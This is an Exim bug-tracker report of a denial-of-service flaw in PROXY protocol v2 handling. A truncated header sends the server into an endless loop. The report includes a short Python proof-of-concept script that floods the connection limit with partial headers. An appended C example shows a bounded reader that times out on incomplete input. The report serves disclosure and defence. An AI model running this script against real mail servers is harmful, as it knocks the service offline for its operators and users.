[Bug 2957] New: DoS In Proxy Protocol v2 handling
https://bugs.exim.org/show_bug.cgi?id=2957

Bug ID: 2957
Summary: DoS In Proxy Protocol v2 handling
Product: Exim
Version: 4.96+
Hardware: x86-64
OS: Linux
Status: NEW
Severity: security
Priority: medium
Component: Delivery in general
Assignee: unallocated@exim.org
Reporter: kevin.massey1189@gmail.com
CC: exim-dev@exim.org

By sending a partial proxy protocol v2 message, exim enters an endless loop in
setup_proxy_protocol_host() on line 1338. If enough messages are sent to meet
the maximum allowed number of connections, then all additional connections are
rejected. This loop persists even if the connection is manually torn down on
the host.

I assume this is fairly low impact as exim must be compiled with SUPPORT_PROXY
enabled and the sending host must be listed in the hosts_proxy configuration
entry (either directly or as part of a wildcard).

PoC
--------------------------------------------------------------------------------
import socket

MAX_CONNECTIONS = 25

hst = "10.0.0.182"
port = 2525

i = 0
while i < MAX_CONNECTIONS:

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((hst, port))

        s.send(b"\x0d\x0a\x0d\x0a\x00\x0d\x0a\x51\x55\x49\x54\x0a\x21\x11\x00\x01")

    i += 1
--------------------------------------------------------------------------------

## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
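
Added example, not part of the original report and not Exim's code: a bounded PROXY protocol v2 header reader that rejects or times out on a partial message instead of waiting for it indefinitely. The names read_full, pp2_read, pp2_feed and the PP2_* codes are hypothetical, and the 200 ms wait is an assumed value; the 16-byte header layout and the minimum address-block sizes follow the PROXY protocol v2 specification.

```c
#include <errno.h>
#include <poll.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

enum { PP2_OK = 0, PP2_BAD = -1, PP2_SHORT = -2, PP2_TIMEOUT = -3 };
static const uint8_t PP2_SIG[12] = {13, 10, 13, 10, 0, 13, 10, 'Q', 'U', 'I', 'T', 10};
static const size_t PP2_MIN[4] = {0, 12, 36, 216}; /* min block: UNSPEC, INET, INET6, UNIX */

/* Read exactly n bytes; each wait is bounded by poll() and EOF ends the read. */
static int read_full(int fd, uint8_t *buf, size_t n, int timeout_ms) {
    for (size_t got = 0; got < n; ) {
        struct pollfd p = { .fd = fd, .events = POLLIN };
        int r = poll(&p, 1, timeout_ms);
        if (r == 0) return PP2_TIMEOUT;
        if (r < 0 && errno == EINTR) continue;
        ssize_t k = r < 0 ? -1 : recv(fd, buf + got, n - got, 0);
        if (k <= 0) return PP2_SHORT;   /* EOF or error: give up, never spin */
        got += (size_t)k;
    }
    return PP2_OK;
}

/* Validate the fixed 16-byte header before waiting for the address block. */
int pp2_read(int fd, uint8_t *addr, size_t cap, size_t *addr_len, int timeout_ms) {
    uint8_t h[16];
    int rc = read_full(fd, h, sizeof h, timeout_ms);
    if (rc != PP2_OK) return rc;
    size_t len = ((size_t)h[14] << 8) | h[15], cmd = h[12] & 15, fam = h[13] >> 4;
    if (memcmp(h, PP2_SIG, 12) != 0 || (h[12] >> 4) != 2 || cmd > 1 || fam > 3) return PP2_BAD;
    if ((cmd == 1 && len < PP2_MIN[fam]) || len > cap) return PP2_BAD;
    *addr_len = len;
    return read_full(fd, addr, len, timeout_ms);
}

/* Demo: feed constructed bytes through a socketpair; half-close the sender if asked. */
int pp2_feed(const uint8_t *msg, size_t n, int close_peer) {
    int sv[2], rc = -99; uint8_t addr[232]; size_t alen = 0;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return rc;
    if (send(sv[0], msg, n, 0) == (ssize_t)n) {
        if (close_peer) shutdown(sv[0], SHUT_WR);
        rc = pp2_read(sv[1], addr, sizeof addr, &alen, 200);
    }
    close(sv[0]); close(sv[1]);
    return rc;
}
```

The wait is bounded per poll() call rather than by one overall deadline, so a production reader would also cap the total time spent on the header.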